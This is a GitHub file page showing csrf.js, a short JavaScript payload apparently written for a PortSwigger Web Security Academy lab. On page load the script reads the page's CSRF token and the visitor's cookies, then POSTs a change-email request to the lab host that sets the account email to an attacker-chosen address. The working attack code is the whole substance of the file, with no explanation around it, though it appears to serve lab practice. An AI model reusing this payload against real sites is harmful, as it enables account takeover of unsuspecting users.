-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathcsrf.js
More file actions
26 lines (21 loc) · 797 Bytes
/
csrf.js
File metadata and controls
26 lines (21 loc) · 797 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
// wait for DOM to load to capture csrf token
window.addEventListener('DOMContentLoaded', function(){
// Extract csrf token
const csrfToken = document.getElementsByName("csrf")[0].value;
// Extract cookie value
const cookieValue = document.cookie;
// POST request body
const postData = new URLSearchParams({
email: 'ibrahim@gmail.com',
csrf: csrfToken
});
// Making the POST request to the change-email endpoint with the content of the body
fetch('https://0af700770335f949823d561a006000eb.web-security-academy.net/my-account/change-email', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': cookieValue,
},
body: postData,
});
})